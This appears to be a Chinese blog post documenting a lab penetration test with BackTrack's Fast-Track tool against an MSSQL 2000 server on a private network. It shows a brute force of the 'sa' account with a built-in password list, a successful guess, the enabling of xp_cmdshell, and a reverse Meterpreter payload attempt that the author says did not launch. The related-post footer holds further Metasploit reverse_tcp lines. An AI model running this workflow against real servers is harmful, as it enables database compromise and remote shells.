(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)

最新推荐文章于 2023-02-01 18:42:22 发布
最新推荐文章于 2023-02-01 18:42:22 发布
阅读量1k 收藏
点赞数
分类专栏: metasploit mssqlserver2000 backtrack fasttrack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9276477
版权

在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为:

METASPLOIT_PATH=/opt/metasploit/app/

否则会找不到msfcli。

然后进入fasttrack进行操作:

root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 2
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter the IP Address and Port Number to Attack.

    Options: (a)ttempt SQL Ping and Auto Quick Brute Force
             (m)ass scan and dictionary brute
             (s)ingle Target (Attack a Single Target with big dictionary)
             (f)ind SQL Ports (SQL Ping)
             (i) want a command prompt and know which system is vulnerable
             (v)ulnerable system, I want to add a local admin on the box...
             (r)aw SQL commands to the SQL Server
             (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
             (h)ost list file of IP addresses you want to attack
           
             (q)uit
            
    Enter Option: a
Enter username for SQL database (example:sa): sa
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 192.168.1.1/24

Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.

Do you want to perform advanced identification, yes or no: yes

这样设置好之后,就开始SQL ping了: 

[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433

Brute forcing password of  on IP 192.168.1.142:1433

Brute forcing password of password on IP 192.168.1.142:1433

Brute forcing password of sqlserver on IP 192.168.1.142:1433

Brute forcing password of sql on IP 192.168.1.142:1433

Brute forcing password of password1 on IP 192.168.1.142:1433

Brute forcing password of password123 on IP 192.168.1.142:1433

Brute forcing password of complexpassword on IP 192.168.1.142:1433

Brute forcing password of database on IP 192.168.1.142:1433

Brute forcing password of server on IP 192.168.1.142:1433

Brute forcing password of changeme on IP 192.168.1.142:1433

Brute forcing password of change on IP 192.168.1.142:1433

Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433

Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433

Brute forcing password of Sqlserver on IP 192.168.1.142:1433

Brute forcing password of SqlServer on IP 192.168.1.142:1433

Brute forcing password of Password1 on IP 192.168.1.142:1433

Brute forcing password of Password2 on IP 192.168.1.142:1433

Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433

Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433

Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433

Brute forcing password of P@ssword! on IP 192.168.1.142:1433

Brute forcing password of Password! on IP 192.168.1.142:1433

Brute forcing password of password! on IP 192.168.1.142:1433

Brute forcing password of sqlsvr on IP 192.168.1.142:1433

Brute forcing password of sqlaccount on IP 192.168.1.142:1433

Brute forcing password of account on IP 192.168.1.142:1433

Brute forcing password of sasa on IP 192.168.1.142:1433

Brute forcing password of sa on IP 192.168.1.142:1433

Brute forcing password of administator on IP 192.168.1.142:1433

Brute forcing password of pass on IP 192.168.1.142:1433

Brute forcing password of sql on IP 192.168.1.142:1433

Brute forcing password of sqlsql on IP 192.168.1.142:1433

Brute forcing password of microsoft on IP 192.168.1.142:1433

Brute forcing password of sqlserver on IP 192.168.1.142:1433

Brute forcing password of sa on IP 192.168.1.142:1433

Brute forcing password of sasa on IP 192.168.1.142:1433

Brute forcing password of welcome on IP 192.168.1.142:1433

Brute forcing password of sqlpass on IP 192.168.1.142:1433

Brute forcing password of sqlpassword on IP 192.168.1.142:1433

Brute forcing password of guessme on IP 192.168.1.142:1433

Brute forcing password of bird on IP 192.168.1.142:1433

Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433

Brute forcing password of test on IP 192.168.1.142:1433

Brute forcing password of dev on IP 192.168.1.142:1433

Brute forcing password of qa on IP 192.168.1.142:1433

Brute forcing password of god on IP 192.168.1.142:1433

Brute forcing password of sysadmin on IP 192.168.1.142:1433

Brute forcing password of water on IP 192.168.1.142:1433

Brute forcing password of dirt on IP 192.168.1.142:1433

Brute forcing password of air on IP 192.168.1.142:1433

Brute forcing password of earth on IP 192.168.1.142:1433

Brute forcing password of company on IP 192.168.1.142:1433

Brute forcing password of secret on IP 192.168.1.142:1433

Brute forcing password of sqlpass123 on IP 192.168.1.142:1433

Brute forcing password of 123456 on IP 192.168.1.142:1433

Brute forcing password of abcd123 on IP 192.168.1.142:1433

Brute forcing password of abc on IP 192.168.1.142:1433

Brute forcing password of burp on IP 192.168.1.142:1433

Brute forcing password of private on IP 192.168.1.142:1433

Brute forcing password of unknown on IP 192.168.1.142:1433

Brute forcing password of wicked on IP 192.168.1.142:1433

Brute forcing password of alpine on IP 192.168.1.142:1433

Brute forcing password of trust on IP 192.168.1.142:1433

Brute forcing password of microsoft on IP 192.168.1.142:1433

Brute forcing password of sql2000 on IP 192.168.1.142:1433

Brute forcing password of sql2003 on IP 192.168.1.142:1433

Brute forcing password of sql2005 on IP 192.168.1.142:1433

Brute forcing password of sql2008 on IP 192.168.1.142:1433

Brute forcing password of vista on IP 192.168.1.142:1433

Brute forcing password of xp on IP 192.168.1.142:1433

Brute forcing password of nt on IP 192.168.1.142:1433

Brute forcing password of 98 on IP 192.168.1.142:1433

Brute forcing password of 95 on IP 192.168.1.142:1433

Brute forcing password of 2003 on IP 192.168.1.142:1433

Brute forcing password of 2008 on IP 192.168.1.142:1433

Sorry the brute force attack was unsuccessful. Better luck next time!

fasttrack成功得找到了mssql2k的IP:192.168.1.142,但是没猜对密码,接下来我修改一下密码,使得它可以成功。



然后继续sql ping:

Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433

Brute forcing password of  on IP 192.168.1.142:1433

Brute forcing password of password on IP 192.168.1.142:1433

Brute forcing password of sqlserver on IP 192.168.1.142:1433

Brute forcing password of sql on IP 192.168.1.142:1433

Brute forcing password of password1 on IP 192.168.1.142:1433

Brute forcing password of password123 on IP 192.168.1.142:1433

SQL Server Compromised: "sa" with password of: "password123" on IP 192.168.1.142:1433

Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 192.168.1.142:1433 *** U/N: sa P/W: password123 ***

*******************************************

To interact with system, enter the SQL Server number. 

Example: 1. 192.168.1.32 you would type 1

Enter the number: 1
Specify payload:

1. Standard Command Prompt
2. Metasploit Reverse VNC TCP (Requires Metasploit) 
3. Metasploit Meterpreter (Requires Metasploit)
4. Metasploit Reflective VNC DLL Injection (Requires Metasploit)
     
Enter number here: 3

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

What port do you want the payload to connect to you on: 4444
Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..

这样,就发现了密码password123。但是接下来,并没有成功: 

Sending payload: 6200
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other compromised SQL Servers.
Press enter to return back to compromised SQL Servers.

还要看看代码,调试一下,明天再搞。

feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Algorithm学习笔记 --- brute force算法(暴力算法)
杨鑫newlife的专栏
10-21 2万+
Algorithm学习笔记 --- brute force算法(暴力算法)
Brute Force(暴力破解)
kid的博客
04-23 6714
Brute Force(暴力破解) 前言 主要针对dvwa的Brute Force做一个练习,学习了解Brute Force。 主要会用到brupsuite和hydra两个工具。 练习 Low 可以看到下面是暴力破解的界面,但看到这个界面我第一反应是先尝试sql注入(最近在一个靶场练习,里面有道sql注入也是这种用户登录,而且暂时还没搞定…,后面搞定再写篇博客讲讲菜鸡的辛酸泪…),言归正传,我们还...
渗透之——Metasploit渗透MSSQL
冰河的专栏
01-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86535576 攻击机 kali 192.168.109.137 靶机 Win7_x64 192.168.109.139 数据库 MSSQL 2008 R2 MSSQL运行在TCP的1433端口以及UDP的1434端口 1.使用NMAP对MSSQL进行踩点 这里,我们使...
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
天元喜羊羊的博客
07-08 1113
fasttrack操作: root@bt:~# cd /pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks...
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 1909
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
SQL Injector - GET Manual Setup Binary Payload Attack
天元喜羊羊的博客
07-08 1002
bt5上操作: ***************************************************************** ** ** ** Fast-Track - A new beginning...
(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因
天元喜羊羊的博客
07-10 873
今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题: print "Metasploit payload delivered.." print "Converting our payload to binary, this may take a few..." query5=("""xp_c
【算法】Brute-Force 算法
代码星辰的博客
02-01 2084
本文介绍字符串的模式匹配算法之一——Brute-Force 算法,包括其概述、代码实现等。
bruteForce:暴力破解各种服务的工具
04-13
蛮力 ━━┓━━━━━━━━━━━━━━━━━━━━━━━━┓━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━┓━━━━━┃┗━━┓┏━━┓┏━...
bruteforce-http-auth:Bruteforce HTTP身份验证
02-03
Bruteforce HTTP身份验证 警告 /!\未经过充分测试/!\ 描述 暴力破解HTTP认证表单的简单工具。 支持: 基本HTTP验证 摘要式HTTP验证 NTLM身份验证 用法 用法示例: python3 bruteforce-...
bruteforce-database_passwords_cracking_bruteforce_
10-02
Bruteforce database passwords list wordlists
Java数据结构及算法实例:朴素字符匹配 Brute Force
09-03
朴素字符匹配,也称为Brute Force算法,是一种基础的字符串搜索方法。它的基本思想是对每一对主串(待查找的字符串)和模式串(要匹配的子串)进行逐字符的比较,直到找到匹配的子串或者遍历完所有可能的起始位置。...
Brute-force-algorithm.rar_Brute Force Search_brute force_brutef
09-20
穷举算法,VC中的经典程序之一,适合初学者,
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
metasploit运行run vnc
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8035
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
metasploit文件格式漏洞渗透攻击(成功获得shell)
天元喜羊羊的博客
05-14 7137
环境BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t
please give me a splunk securlty event rule about internet bruteforce detect
最新发布
07-14
Here's an example of a Splunk security event rule for detecting internet brute-force attacks: ``` index=your_index sourcetype=your_sourcetype source=your_source | rex field=_raw "Failed login for ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值